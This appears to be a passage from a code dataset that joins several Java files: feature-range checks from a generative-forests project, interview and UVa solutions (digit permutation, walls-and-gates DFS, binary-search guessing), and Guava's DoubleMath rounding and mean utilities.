int i, ia, ib;
if (index_a != index_b)
Dataset.perror("Feature.class :: not the same feature (" + index_a + " != " + index_b + ")");
if (!a.type.equals(b.type))
Dataset.perror(
"Feature.class :: not the same type of feature (" + a.type + " != " + b.type + ")");
if (IS_CONTINUOUS(a.type)){
if (a.dmin >= b.dmin){
if (a.dmax <= b.dmax) return true;
else
Dataset.perror(
"Feature.class :: inconsistency for subfeature check for : ("
+ a.dmin
+ ", "
+ a.dmax
+ ") subseteq ("
+ b.dmin
+ ", "
+ b.dmax
+ ") ? ");
} else if (a.dmax < b.dmax)
Dataset.perror(
"Feature.class :: inconsistency for subfeature check for : ("
+ a.dmin
+ ", "
+ a.dmax
+ ") subseteq ("
+ b.dmin
+ ", "
+ b.dmax
+ ") ? ");
}else if (IS_INTEGER(a.type)){
if (a.imin >= b.imin){
if (a.imax <= b.imax) return true;
else
Dataset.perror(
"Feature.class :: inconsistency for subfeature check for : ("
+ a.imin
+ ", "
+ a.imax
+ ") subseteq ("
+ b.imin
+ ", "
+ b.imax
+ ") ? ");
} else if (a.imax < b.imax)
Dataset.perror(
"Feature.class :: inconsistency for subfeature check for : ("
+ a.imin
+ ", "
+ a.imax
+ ") subseteq ("
+ b.imin
+ ", "
+ b.imax
+ ") ? ");
}else if (IS_NOMINAL(a.type)){
if (a.modalities == null)
return true;
else if (b.modalities != null){
anotinb = bnotina = false;
ia = ib = -1;
for (i=0;i<a.modalities.size();i++)
if (!b.modalities.contains((String) a.modalities.elementAt(i))){
anotinb = true;
ia = i;
}
for (i=0;i<b.modalities.size();i++)
if (!a.modalities.contains((String) b.modalities.elementAt(i))){
bnotina = true;
ib = i;
}
if ((anotinb) && (bnotina))
Dataset.perror(
"Feature.class :: inconsistency for subfeature check for : "
+ ((String) a.modalities.elementAt(ia))
+ " not in b and "
+ ((String) b.modalities.elementAt(ib))
+ " not in a ");
else if (!anotinb) return true;
}
}else
Dataset.perror("Feature.class :: no Feature type for " + a.type);
return false;
}
public static boolean IS_CONTINUOUS(String t){
return (t.equals(Feature.CONTINUOUS));
}
public static boolean IS_INTEGER(String t){
// equiv. to Nominal Mono-valued, ordered
return (t.equals(Feature.INTEGER));
}
static boolean IS_NOMINAL(String t){
// Nominal Mono-Valued, no order
return (t.equals(Feature.NOMINAL));
}
static int INDEX(String t){
int i = 0;
do {
if (t.equals(TYPE[i]))
return i;
i++;
}while(i < TYPE.length);
Dataset.perror("No type found for " + t);
return -1;
}
public static Feature DOMAIN_FEATURE(String n, String t, Vector <String> m, Vector <Double> vd, Vector <Integer> vi, double miv, double mav){
Feature f = new Feature(n, t, m, miv, mav);
int i;
if (f.type.equals(Feature.CONTINUOUS)){
f.observed_doubles = new double[vd.size()];
for (i=0;i<vd.size();i++)
f.observed_doubles[i] = vd.elementAt(i).doubleValue();
Arrays.sort(f.observed_doubles);
}
if (f.type.equals(Feature.INTEGER)){
f.observed_ints = new int[vi.size()];
for (i=0;i<vi.size();i++)
f.observed_ints[i] = vi.elementAt(i).intValue();
Arrays.sort(f.observed_ints);
}
return f;
}
Feature(String n, String t, Vector <String> m, double miv, double mav){
name = n;
type = t;
modalities = null;
observed_doubles = null;
observed_ints = null;
if (((Feature.IS_CONTINUOUS(t)) || (Feature.IS_INTEGER(t))) && (miv > mav))
Dataset.perror(
"Feature.class :: Continuous or Integer feature has min value "
+ miv
+ " > max value "
+ mav);
else if ((Feature.IS_NOMINAL(t)) && (miv < mav))
Dataset.perror(
"Feature.class :: Nominal feature "
+ name
+ " has min value = "
+ miv
+ ", max value = "
+ mav
+ ", should be default Forbidden value "
+ Feature.FORBIDDEN_VALUE);
if ((Feature.IS_CONTINUOUS(t)) && (miv >= mav))
Dataset.perror(
"Feature.class :: Continuous feature "
+ n
+ " has min value "
+ miv
+ " >= max value "
+ mav);
if ((!Feature.IS_NOMINAL(t))
&& ((miv == (double) Feature.FORBIDDEN_VALUE) && (mav == (double) Feature.FORBIDDEN_VALUE)))
Dataset.perror(
"Feature.class :: Non nominal feature "
+ n
+ " has min value "
+ Feature.FORBIDDEN_VALUE
+ " == max value "
+ Feature.FORBIDDEN_VALUE
+ " = Forbidden value");
if (Feature.IS_CONTINUOUS(t)){
dmin = miv;
dmax = mav;
imin = imax = Feature.FORBIDDEN_VALUE;
}else if (Feature.IS_INTEGER(t)){
imin = (int) miv;
imax = (int) mav;
dmin = dmax = (double) Feature.FORBIDDEN_VALUE;
}else{
imin = imax = Feature.FORBIDDEN_VALUE;
dmin = dmax = (double) Feature.FORBIDDEN_VALUE;
}
if (Feature.IS_NOMINAL(t))
modalities = m;
dispertion_statistic_value = -1.0;
}
Feature(String n, String t, Vector <String> m, double miv, double mav, boolean check_non_zero_measure){
name = n;
type = t;
modalities = null;
observed_doubles = null;
observed_ints = null;
if (((Feature.IS_CONTINUOUS(t)) || (Feature.IS_INTEGER(t))) && (miv > mav))
Dataset.perror(
"Feature.class :: Continuous or Integer feature has min value "
+ miv
+ " > max value "
+ mav);
else if ((Feature.IS_NOMINAL(t)) && (miv < mav))
Dataset.perror(
"Feature.class :: Nominal feature "
+ name
+ " has min value = "
+ miv
+ ", max value = "
+ mav
+ ", should be default Forbidden value "
+ Feature.FORBIDDEN_VALUE);
if ((Feature.IS_CONTINUOUS(t)) && (miv >= mav) && (check_non_zero_measure))
Dataset.perror(
"Feature.class :: Continuous feature "
+ n
+ " has min value "
+ miv
+ " >= max value "
+ mav);
if ((!Feature.IS_NOMINAL(t))
&& ((miv == (double) Feature.FORBIDDEN_VALUE) && (mav == (double) Feature.FORBIDDEN_VALUE)))
Dataset.perror(
"Feature.class :: Non nominal feature "
+ n
+ " has min value "
+ Feature.FORBIDDEN_VALUE
+ " == max value "
+ Feature.FORBIDDEN_VALUE
+ " = Forbidden value");
if (Feature.IS_CONTINUOUS(t)){
dmin = miv;
dmax = mav;
imin = imax = Feature.FORBIDDEN_VALUE;
}else if (Feature.IS_INTEGER(t)){
imin = (int) miv;
imax = (int) mav;
dmin = dmax = (double) Feature.FORBIDDEN_VALUE;
}else{
imin = imax = Feature.FORBIDDEN_VALUE;
dmin = dmax = (double) Feature.FORBIDDEN_VALUE;
}
if (Feature.IS_NOMINAL(t))
modalities = m;
dispertion_statistic_value = -1.0;
}
// ALL PURPOSE INSTANCE METHODS
public boolean has_in_range(double v){
if ( (Feature.IS_NOMINAL(type)) || (Feature.IS_INTEGER(type)) )
Dataset.perror("Feature.class :: feature " + this + " queried for double value " + v);
if (!Feature.IS_CONTINUOUS(type))
Dataset.perror("Feature.class :: feature type " + type + " unregistered ");
if (v < dmin)
return false;
if (v > dmax)
return false;
return true;
}
public boolean has_in_range(int v){
if ( (Feature.IS_NOMINAL(type)) || (Feature.IS_CONTINUOUS(type)) )
      Dataset.perror("Feature.class :: feature " + this + " queried for integer value " + v);
if (!Feature.IS_INTEGER(type))
Dataset.perror("Feature.class :: feature type " + type + " unregistered ");
if (v < imin)
return false;
if (v > imax)
return false;
return true;
}
public boolean has_in_range(String s){
if ((Feature.IS_CONTINUOUS(type)) || (Feature.IS_INTEGER(type)))
      Dataset.perror(
          "Feature.class :: Non-nominal feature " + this + " queried for nominal value " + s);
if (!Feature.IS_NOMINAL(type))
Dataset.perror("Feature.class :: feature type " + type + " unregistered ");
int i;
String ss;
for (i=0;i<modalities.size();i++){
ss = (String) modalities.elementAt(i);
if (ss.equals(s))
return true;
}
return false;
}
public boolean has_in_range(FeatureValue v){
if (!type.equals(v.type))
Dataset.perror(
"Feature.class :: Feature "
+ this
+ " not of the same type as value "
+ v
+ " => cannot contain it");
if ( ( (Feature.IS_NOMINAL(type)) && (has_in_range(v.sv)) )
|| ( (Feature.IS_CONTINUOUS(type)) && (has_in_range(v.dv)) )
|| ( (Feature.IS_INTEGER(type)) && (has_in_range(v.iv)) ) )
return true;
return false;
}
public String range(boolean in_generator){
String v = "";
int i;
if (Feature.IS_NOMINAL(type)){
v += "{";
for (i=0;i<modalities.size();i++){
v += "" + modalities.elementAt(i);
if (i<modalities.size() - 1)
v += ", ";
}
v += "}";
}else if (Feature.IS_CONTINUOUS(type)){
v += "[" + DF4.format(dmin) + ", " + DF4.format(dmax) + "]";
}else if (Feature.IS_INTEGER(type)){
if (imax == imin)
v += "{" + imin + "}";
else{
v += "{" + imin + ", " + (imin + 1) ;
if (imax > imin + 2)
v += ", ...";
if (imax > imin + 1)
v += ", " + imax;
v += "}";
}
}
return v;
}
public String toString(){
String v = "";
int i;
v +=
name
+ " -- "
+ type
+ " in "
+ range(false)
+ " ["
+ Feature.DISPERSION_NAME[Feature.TYPE_INDEX(type)]
+ " = "
+ DF4.format(dispertion_statistic_value)
+ "]";
return v;
}
public String toShortString(){
String v = "";
int i;
v += "[ " + name + " : " + type + " in " + range(false) + " ]";
return v;
}
public String toStringInTree(boolean internalnode){
String v = "";
int i;
if (internalnode)
v += name + " (" + type + ") in " + range(true) + ";";
else
v += "(" + name + " in " + range(true) + ")";
return v;
}
}
| google-research/google-research | generative_forests/src/Feature.java |
1,176 | /**
* Given any positive integer, if we permute its digits, the difference between the number we get and the
* given number will always be divisible by 9.
* For example, if the given number is 123, we may rearrange the digits to get 321. The difference =
* 321 - 123 = 198, which is a multiple of 9 (198 = 9 × 22).
* We can prove this fact fairly easily, but since we are not having a maths contest, we instead try to
* illustrate this fact with the help of a computer program.
* Input
* Each line of input gives a positive integer n (≤ 2000000000). You are to find two integers a and b
* formed by rearranging the digits of n, such that a − b is maximum. a and b should NOT have leading
* zeros.
* Output
* You should then show that a − b is a multiple of 9, by expressing it as ‘9 * k’, where k is an integer.
* See the sample output for the correct output format.
* Sample Input
* 123
* 2468
* Sample Output
* 321 - 123 = 198 = 9 * 22
* 8642 - 2468 = 6174 = 9 * 686
*/
//https://uva.onlinejudge.org/index.php?option=onlinejudge&Itemid=99999999&page=show_problem&category=&problem=2366
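// Why the difference is always a multiple of 9 (sketch): since 10 is congruent to 1 (mod 9), a decimal
// number is congruent to its digit sum modulo 9; permuting the digits preserves that residue, so the
// difference of any two permutations is congruent to 0 (mod 9).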
import java.util.Arrays;
import java.util.Scanner;
public class NumberTheoryForNewbies {
public static void main(String[] args) {
Scanner input = new Scanner(System.in);
while (input.hasNextLong()) {
String inputValue = input.nextLine();
StringBuilder minimal = new StringBuilder();
StringBuilder maximal = new StringBuilder();
char[] characters = inputValue.toCharArray();
int length = characters.length;
Arrays.sort(characters);
int index;
for (index = 0; index < length; index++) {
if (characters[index] != '0') {
break;
}
}
if (index != 0) {
characters[0] = characters[index];
characters[index] = '0';
}
for (int i = 0; i < length; i++) {
minimal.append(characters[i]);
}
Arrays.sort(characters);
for (int i = length - 1; i > -1; i--) {
maximal.append(characters[i]);
}
long maximalNumber = Long.valueOf(maximal.toString());
long minimalNumber = Long.valueOf(minimal.toString());
long difference = maximalNumber - minimalNumber;
System.out.println(maximal + " - " + minimal + " = " + difference
+ " = 9 * " + (difference / 9));
}
}
}
| kdn251/interviews | uva/NumberTheoryForNewbies.java |
1,178 | // You are given a m x n 2D grid initialized with these three possible values.
// -1 - A wall or an obstacle.
// 0 - A gate.
// INF - Infinity means an empty room. We use the value 231 - 1 = 2147483647 to represent INF as you may assume that the distance to a gate is less than 2147483647.
// Fill each empty room with the distance to its nearest gate. If it is impossible to reach a gate, it should be filled with INF.
// For example, given the 2D grid:
// INF -1 0 INF
// INF INF INF -1
// INF -1 INF -1
// 0 -1 INF INF
// After running your function, the 2D grid should be:
// 3 -1 0 1
// 2 2 1 -1
// 1 -1 2 -1
// 0 -1 3 4
public class WallsAndGates {
public void wallsAndGates(int[][] rooms) {
//iterate through the matrix calling dfs on all indices that contain a zero
for(int i = 0; i < rooms.length; i++) {
for(int j = 0; j < rooms[0].length; j++) {
if(rooms[i][j] == 0) {
dfs(rooms, i, j, 0);
}
}
}
}
void dfs(int[][] rooms, int i, int j, int distance) {
//if you have gone out of the bounds of the array or you have run into a wall/obstacle, return
        // rooms[i][j] < distance also ensures that we do not overwrite any previously determined distance that is shorter than our current distance
if(i < 0 || i >= rooms.length || j < 0 || j >= rooms[0].length || rooms[i][j] < distance) {
return;
}
//set current index's distance to distance
rooms[i][j] = distance;
//recurse on all adjacent neighbors of rooms[i][j]
dfs(rooms, i + 1, j, distance + 1);
dfs(rooms, i - 1, j, distance + 1);
dfs(rooms, i, j + 1, distance + 1);
dfs(rooms, i, j - 1, distance + 1);
}
}
| kdn251/interviews | company/google/WallsAndGates.java |
1,179 | // We are playing the Guess Game. The game is as follows:
// I pick a number from 1 to n. You have to guess which number I picked.
// Every time you guess wrong, I'll tell you whether the number is higher or lower.
// You call a pre-defined API guess(int num) which returns 3 possible results (-1, 1, or 0):
// -1 : My number is lower
// 1 : My number is higher
// 0 : Congrats! You got it!
// Example:
// n = 10, I pick 6.
// Return 6.
public class GuessNumberHigherOrLower extends GuessGame {
public int guessNumber(int n) {
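        // Standard binary search over [1, n], narrowing the range using the feedback from guess(mid).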
int left = 1;
int right = n;
while(left <= right) {
int mid = left + (right - left) / 2;
if(guess(mid) == 0) {
return mid;
} else if(guess(mid) > 0) {
left = mid + 1;
} else {
                right = mid - 1;
}
}
return -1;
}
}
| kdn251/interviews | leetcode/binary-search/GuessNumberHigherOrLower.java |
1,181 | // You are given a m x n 2D grid initialized with these three possible values.
// -1 - A wall or an obstacle.
// 0 - A gate.
// INF - Infinity means an empty room. We use the value 231 - 1 = 2147483647 to represent INF as you may assume that the distance to a gate is less than 2147483647.
// Fill each empty room with the distance to its nearest gate. If it is impossible to reach a gate, it should be filled with INF.
// For example, given the 2D grid:
// INF -1 0 INF
// INF INF INF -1
// INF -1 INF -1
// 0 -1 INF INF
// After running your function, the 2D grid should be:
// 3 -1 0 1
// 2 2 1 -1
// 1 -1 2 -1
// 0 -1 3 4
public class WallsAndGates {
public void wallsAndGates(int[][] rooms) {
//iterate through the matrix calling dfs on all indices that contain a zero
for(int i = 0; i < rooms.length; i++) {
for(int j = 0; j < rooms[0].length; j++) {
if(rooms[i][j] == 0) {
dfs(rooms, i, j, 0);
}
}
}
}
void dfs(int[][] rooms, int i, int j, int distance) {
//if you have gone out of the bounds of the array or you have run into a wall/obstacle, return
        // rooms[i][j] < distance also ensures that we do not overwrite any previously determined distance that is shorter than our current distance
if(i < 0 || i >= rooms.length || j < 0 || j >= rooms[0].length || rooms[i][j] < distance) {
return;
}
//set current index's distance to distance
rooms[i][j] = distance;
//recurse on all adjacent neighbors of rooms[i][j]
dfs(rooms, i + 1, j, distance + 1);
dfs(rooms, i - 1, j, distance + 1);
dfs(rooms, i, j + 1, distance + 1);
dfs(rooms, i, j - 1, distance + 1);
}
}
| kdn251/interviews | company/facebook/WallsAndGates.java |
1,183 | /*
* Copyright (C) 2011 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package com.google.common.math;
import static com.google.common.base.Preconditions.checkArgument;
import static com.google.common.math.DoubleUtils.IMPLICIT_BIT;
import static com.google.common.math.DoubleUtils.SIGNIFICAND_BITS;
import static com.google.common.math.DoubleUtils.getSignificand;
import static com.google.common.math.DoubleUtils.isFinite;
import static com.google.common.math.DoubleUtils.isNormal;
import static com.google.common.math.DoubleUtils.scaleNormalize;
import static com.google.common.math.MathPreconditions.checkInRangeForRoundingInputs;
import static com.google.common.math.MathPreconditions.checkNonNegative;
import static com.google.common.math.MathPreconditions.checkRoundingUnnecessary;
import static java.lang.Math.abs;
import static java.lang.Math.copySign;
import static java.lang.Math.getExponent;
import static java.lang.Math.log;
import static java.lang.Math.rint;
import com.google.common.annotations.GwtCompatible;
import com.google.common.annotations.GwtIncompatible;
import com.google.common.annotations.VisibleForTesting;
import com.google.common.primitives.Booleans;
import com.google.errorprone.annotations.CanIgnoreReturnValue;
import java.math.BigInteger;
import java.math.RoundingMode;
import java.util.Iterator;
/**
* A class for arithmetic on doubles that is not covered by {@link java.lang.Math}.
*
* @author Louis Wasserman
* @since 11.0
*/
@GwtCompatible(emulated = true)
@ElementTypesAreNonnullByDefault
public final class DoubleMath {
/*
* This method returns a value y such that rounding y DOWN (towards zero) gives the same result as
* rounding x according to the specified mode.
*/
@GwtIncompatible // #isMathematicalInteger, com.google.common.math.DoubleUtils
static double roundIntermediate(double x, RoundingMode mode) {
if (!isFinite(x)) {
throw new ArithmeticException("input is infinite or NaN");
}
switch (mode) {
case UNNECESSARY:
checkRoundingUnnecessary(isMathematicalInteger(x));
return x;
case FLOOR:
if (x >= 0.0 || isMathematicalInteger(x)) {
return x;
} else {
return (long) x - 1;
}
case CEILING:
if (x <= 0.0 || isMathematicalInteger(x)) {
return x;
} else {
return (long) x + 1;
}
case DOWN:
return x;
case UP:
if (isMathematicalInteger(x)) {
return x;
} else {
return (long) x + (x > 0 ? 1 : -1);
}
case HALF_EVEN:
return rint(x);
case HALF_UP:
{
double z = rint(x);
if (abs(x - z) == 0.5) {
return x + copySign(0.5, x);
} else {
return z;
}
}
case HALF_DOWN:
{
double z = rint(x);
if (abs(x - z) == 0.5) {
return x;
} else {
return z;
}
}
default:
throw new AssertionError();
}
}
/**
* Returns the {@code int} value that is equal to {@code x} rounded with the specified rounding
* mode, if possible.
*
* @throws ArithmeticException if
* <ul>
* <li>{@code x} is infinite or NaN
* <li>{@code x}, after being rounded to a mathematical integer using the specified rounding
* mode, is either less than {@code Integer.MIN_VALUE} or greater than {@code
* Integer.MAX_VALUE}
* <li>{@code x} is not a mathematical integer and {@code mode} is {@link
* RoundingMode#UNNECESSARY}
* </ul>
*/
@GwtIncompatible // #roundIntermediate
public static int roundToInt(double x, RoundingMode mode) {
double z = roundIntermediate(x, mode);
checkInRangeForRoundingInputs(
z > MIN_INT_AS_DOUBLE - 1.0 & z < MAX_INT_AS_DOUBLE + 1.0, x, mode);
return (int) z;
}
private static final double MIN_INT_AS_DOUBLE = -0x1p31;
private static final double MAX_INT_AS_DOUBLE = 0x1p31 - 1.0;
/**
* Returns the {@code long} value that is equal to {@code x} rounded with the specified rounding
* mode, if possible.
*
* @throws ArithmeticException if
* <ul>
* <li>{@code x} is infinite or NaN
* <li>{@code x}, after being rounded to a mathematical integer using the specified rounding
* mode, is either less than {@code Long.MIN_VALUE} or greater than {@code
* Long.MAX_VALUE}
* <li>{@code x} is not a mathematical integer and {@code mode} is {@link
* RoundingMode#UNNECESSARY}
* </ul>
*/
@GwtIncompatible // #roundIntermediate
public static long roundToLong(double x, RoundingMode mode) {
double z = roundIntermediate(x, mode);
checkInRangeForRoundingInputs(
MIN_LONG_AS_DOUBLE - z < 1.0 & z < MAX_LONG_AS_DOUBLE_PLUS_ONE, x, mode);
return (long) z;
}
private static final double MIN_LONG_AS_DOUBLE = -0x1p63;
/*
* We cannot store Long.MAX_VALUE as a double without losing precision. Instead, we store
* Long.MAX_VALUE + 1 == -Long.MIN_VALUE, and then offset all comparisons by 1.
*/
private static final double MAX_LONG_AS_DOUBLE_PLUS_ONE = 0x1p63;
/**
* Returns the {@code BigInteger} value that is equal to {@code x} rounded with the specified
* rounding mode, if possible.
*
* @throws ArithmeticException if
* <ul>
* <li>{@code x} is infinite or NaN
* <li>{@code x} is not a mathematical integer and {@code mode} is {@link
* RoundingMode#UNNECESSARY}
* </ul>
*/
// #roundIntermediate, java.lang.Math.getExponent, com.google.common.math.DoubleUtils
@GwtIncompatible
public static BigInteger roundToBigInteger(double x, RoundingMode mode) {
x = roundIntermediate(x, mode);
if (MIN_LONG_AS_DOUBLE - x < 1.0 & x < MAX_LONG_AS_DOUBLE_PLUS_ONE) {
return BigInteger.valueOf((long) x);
}
int exponent = getExponent(x);
long significand = getSignificand(x);
BigInteger result = BigInteger.valueOf(significand).shiftLeft(exponent - SIGNIFICAND_BITS);
return (x < 0) ? result.negate() : result;
}
/**
* Returns {@code true} if {@code x} is exactly equal to {@code 2^k} for some finite integer
* {@code k}.
*/
@GwtIncompatible // com.google.common.math.DoubleUtils
public static boolean isPowerOfTwo(double x) {
if (x > 0.0 && isFinite(x)) {
long significand = getSignificand(x);
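      // significand & (significand - 1) clears the lowest set bit, so the result is 0 exactly when at
      // most one bit is set, i.e. when x is a power of two.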
return (significand & (significand - 1)) == 0;
}
return false;
}
/**
* Returns the base 2 logarithm of a double value.
*
* <p>Special cases:
*
* <ul>
* <li>If {@code x} is NaN or less than zero, the result is NaN.
* <li>If {@code x} is positive infinity, the result is positive infinity.
* <li>If {@code x} is positive or negative zero, the result is negative infinity.
* </ul>
*
* <p>The computed result is within 1 ulp of the exact result.
*
* <p>If the result of this method will be immediately rounded to an {@code int}, {@link
* #log2(double, RoundingMode)} is faster.
*/
public static double log2(double x) {
return log(x) / LN_2; // surprisingly within 1 ulp according to tests
}
/**
* Returns the base 2 logarithm of a double value, rounded with the specified rounding mode to an
* {@code int}.
*
* <p>Regardless of the rounding mode, this is faster than {@code (int) log2(x)}.
*
* @throws IllegalArgumentException if {@code x <= 0.0}, {@code x} is NaN, or {@code x} is
* infinite
*/
@GwtIncompatible // java.lang.Math.getExponent, com.google.common.math.DoubleUtils
@SuppressWarnings("fallthrough")
public static int log2(double x, RoundingMode mode) {
checkArgument(x > 0.0 && isFinite(x), "x must be positive and finite");
int exponent = getExponent(x);
if (!isNormal(x)) {
return log2(x * IMPLICIT_BIT, mode) - SIGNIFICAND_BITS;
// Do the calculation on a normal value.
}
// x is positive, finite, and normal
boolean increment;
switch (mode) {
case UNNECESSARY:
checkRoundingUnnecessary(isPowerOfTwo(x));
// fall through
case FLOOR:
increment = false;
break;
case CEILING:
increment = !isPowerOfTwo(x);
break;
case DOWN:
increment = exponent < 0 & !isPowerOfTwo(x);
break;
case UP:
increment = exponent >= 0 & !isPowerOfTwo(x);
break;
case HALF_DOWN:
case HALF_EVEN:
case HALF_UP:
double xScaled = scaleNormalize(x);
// sqrt(2) is irrational, and the spec is relative to the "exact numerical result,"
// so log2(x) is never exactly exponent + 0.5.
increment = (xScaled * xScaled) > 2.0;
break;
default:
throw new AssertionError();
}
return increment ? exponent + 1 : exponent;
}
private static final double LN_2 = log(2);
/**
* Returns {@code true} if {@code x} represents a mathematical integer.
*
* <p>This is equivalent to, but not necessarily implemented as, the expression {@code
* !Double.isNaN(x) && !Double.isInfinite(x) && x == Math.rint(x)}.
*/
@GwtIncompatible // java.lang.Math.getExponent, com.google.common.math.DoubleUtils
public static boolean isMathematicalInteger(double x) {
return isFinite(x)
&& (x == 0.0
|| SIGNIFICAND_BITS - Long.numberOfTrailingZeros(getSignificand(x)) <= getExponent(x));
}
/**
   * Returns {@code n!}, that is, the product of the first {@code n} positive integers, {@code 1} if
   * {@code n == 0}, or {@link Double#POSITIVE_INFINITY} if {@code n! > Double.MAX_VALUE}.
*
* <p>The result is within 1 ulp of the true value.
*
* @throws IllegalArgumentException if {@code n < 0}
*/
public static double factorial(int n) {
checkNonNegative("n", n);
if (n > MAX_FACTORIAL) {
return Double.POSITIVE_INFINITY;
} else {
// Multiplying the last (n & 0xf) values into their own accumulator gives a more accurate
// result than multiplying by everySixteenthFactorial[n >> 4] directly.
double accum = 1.0;
for (int i = 1 + (n & ~0xf); i <= n; i++) {
accum *= i;
}
return accum * everySixteenthFactorial[n >> 4];
}
}
@VisibleForTesting static final int MAX_FACTORIAL = 170;
@VisibleForTesting
static final double[] everySixteenthFactorial = {
0x1.0p0,
0x1.30777758p44,
0x1.956ad0aae33a4p117,
0x1.ee69a78d72cb6p202,
0x1.fe478ee34844ap295,
0x1.c619094edabffp394,
0x1.3638dd7bd6347p498,
0x1.7cac197cfe503p605,
0x1.1e5dfc140e1e5p716,
0x1.8ce85fadb707ep829,
0x1.95d5f3d928edep945
};
/**
* Returns {@code true} if {@code a} and {@code b} are within {@code tolerance} of each other.
*
* <p>Technically speaking, this is equivalent to {@code Math.abs(a - b) <= tolerance ||
* Double.valueOf(a).equals(Double.valueOf(b))}.
*
* <p>Notable special cases include:
*
* <ul>
* <li>All NaNs are fuzzily equal.
* <li>If {@code a == b}, then {@code a} and {@code b} are always fuzzily equal.
* <li>Positive and negative zero are always fuzzily equal.
* <li>If {@code tolerance} is zero, and neither {@code a} nor {@code b} is NaN, then {@code a}
* and {@code b} are fuzzily equal if and only if {@code a == b}.
* <li>With {@link Double#POSITIVE_INFINITY} tolerance, all non-NaN values are fuzzily equal.
* <li>With finite tolerance, {@code Double.POSITIVE_INFINITY} and {@code
* Double.NEGATIVE_INFINITY} are fuzzily equal only to themselves.
* </ul>
*
* <p>This is reflexive and symmetric, but <em>not</em> transitive, so it is <em>not</em> an
* equivalence relation and <em>not</em> suitable for use in {@link Object#equals}
* implementations.
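   *
   * <p>For example (illustrative):
   *
   * <pre>{@code
   * DoubleMath.fuzzyEquals(1.0, 1.0 + 1e-10, 1e-9); // true: |a - b| <= tolerance
   * DoubleMath.fuzzyEquals(1.0, 1.01, 1e-9); // false
   * DoubleMath.fuzzyEquals(Double.NaN, Double.NaN, 0.0); // true: all NaNs are fuzzily equal
   * }</pre>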
*
* @throws IllegalArgumentException if {@code tolerance} is {@code < 0} or NaN
* @since 13.0
*/
public static boolean fuzzyEquals(double a, double b, double tolerance) {
MathPreconditions.checkNonNegative("tolerance", tolerance);
return Math.copySign(a - b, 1.0) <= tolerance
// copySign(x, 1.0) is a branch-free version of abs(x), but with different NaN semantics
|| (a == b) // needed to ensure that infinities equal themselves
|| (Double.isNaN(a) && Double.isNaN(b));
}
/**
* Compares {@code a} and {@code b} "fuzzily," with a tolerance for nearly-equal values.
*
* <p>This method is equivalent to {@code fuzzyEquals(a, b, tolerance) ? 0 : Double.compare(a,
* b)}. In particular, like {@link Double#compare(double, double)}, it treats all NaN values as
* equal and greater than all other values (including {@link Double#POSITIVE_INFINITY}).
*
* <p>This is <em>not</em> a total ordering and is <em>not</em> suitable for use in {@link
* Comparable#compareTo} implementations. In particular, it is not transitive.
*
* @throws IllegalArgumentException if {@code tolerance} is {@code < 0} or NaN
* @since 13.0
*/
public static int fuzzyCompare(double a, double b, double tolerance) {
if (fuzzyEquals(a, b, tolerance)) {
return 0;
} else if (a < b) {
return -1;
} else if (a > b) {
return 1;
} else {
return Booleans.compare(Double.isNaN(a), Double.isNaN(b));
}
}
/**
* Returns the <a href="http://en.wikipedia.org/wiki/Arithmetic_mean">arithmetic mean</a> of
* {@code values}.
*
* <p>If these values are a sample drawn from a population, this is also an unbiased estimator of
* the arithmetic mean of the population.
*
* @param values a nonempty series of values
* @throws IllegalArgumentException if {@code values} is empty or contains any non-finite value
* @deprecated Use {@link Stats#meanOf} instead, noting the less strict handling of non-finite
* values.
*/
@Deprecated
// com.google.common.math.DoubleUtils
@GwtIncompatible
public static double mean(double... values) {
checkArgument(values.length > 0, "Cannot take mean of 0 values");
long count = 1;
double mean = checkFinite(values[0]);
for (int index = 1; index < values.length; ++index) {
checkFinite(values[index]);
count++;
// Art of Computer Programming vol. 2, Knuth, 4.2.2, (15)
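      // i.e. mean_k = mean_{k-1} + (x_k - mean_{k-1}) / k, an incremental update that avoids
      // accumulating a potentially huge running sum.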
mean += (values[index] - mean) / count;
}
return mean;
}
/**
* Returns the <a href="http://en.wikipedia.org/wiki/Arithmetic_mean">arithmetic mean</a> of
* {@code values}.
*
* <p>If these values are a sample drawn from a population, this is also an unbiased estimator of
* the arithmetic mean of the population.
*
* @param values a nonempty series of values
* @throws IllegalArgumentException if {@code values} is empty
* @deprecated Use {@link Stats#meanOf} instead, noting the less strict handling of non-finite
* values.
*/
@Deprecated
public static double mean(int... values) {
checkArgument(values.length > 0, "Cannot take mean of 0 values");
// The upper bound on the length of an array and the bounds on the int values mean that, in
// this case only, we can compute the sum as a long without risking overflow or loss of
// precision. So we do that, as it's slightly quicker than the Knuth algorithm.
long sum = 0;
for (int index = 0; index < values.length; ++index) {
sum += values[index];
}
return (double) sum / values.length;
}
/**
* Returns the <a href="http://en.wikipedia.org/wiki/Arithmetic_mean">arithmetic mean</a> of
* {@code values}.
*
* <p>If these values are a sample drawn from a population, this is also an unbiased estimator of
* the arithmetic mean of the population.
*
* @param values a nonempty series of values, which will be converted to {@code double} values
* (this may cause loss of precision for longs of magnitude over 2^53 (slightly over 9e15))
* @throws IllegalArgumentException if {@code values} is empty
* @deprecated Use {@link Stats#meanOf} instead, noting the less strict handling of non-finite
* values.
*/
@Deprecated
public static double mean(long... values) {
checkArgument(values.length > 0, "Cannot take mean of 0 values");
long count = 1;
double mean = values[0];
for (int index = 1; index < values.length; ++index) {
count++;
// Art of Computer Programming vol. 2, Knuth, 4.2.2, (15)
mean += (values[index] - mean) / count;
}
return mean;
}
/**
* Returns the <a href="http://en.wikipedia.org/wiki/Arithmetic_mean">arithmetic mean</a> of
* {@code values}.
*
* <p>If these values are a sample drawn from a population, this is also an unbiased estimator of
* the arithmetic mean of the population.
*
* @param values a nonempty series of values, which will be converted to {@code double} values
* (this may cause loss of precision)
* @throws IllegalArgumentException if {@code values} is empty or contains any non-finite value
* @deprecated Use {@link Stats#meanOf} instead, noting the less strict handling of non-finite
* values.
*/
@Deprecated
// com.google.common.math.DoubleUtils
@GwtIncompatible
public static double mean(Iterable<? extends Number> values) {
return mean(values.iterator());
}
/**
* Returns the <a href="http://en.wikipedia.org/wiki/Arithmetic_mean">arithmetic mean</a> of
* {@code values}.
*
* <p>If these values are a sample drawn from a population, this is also an unbiased estimator of
* the arithmetic mean of the population.
*
* @param values a nonempty series of values, which will be converted to {@code double} values
* (this may cause loss of precision)
* @throws IllegalArgumentException if {@code values} is empty or contains any non-finite value
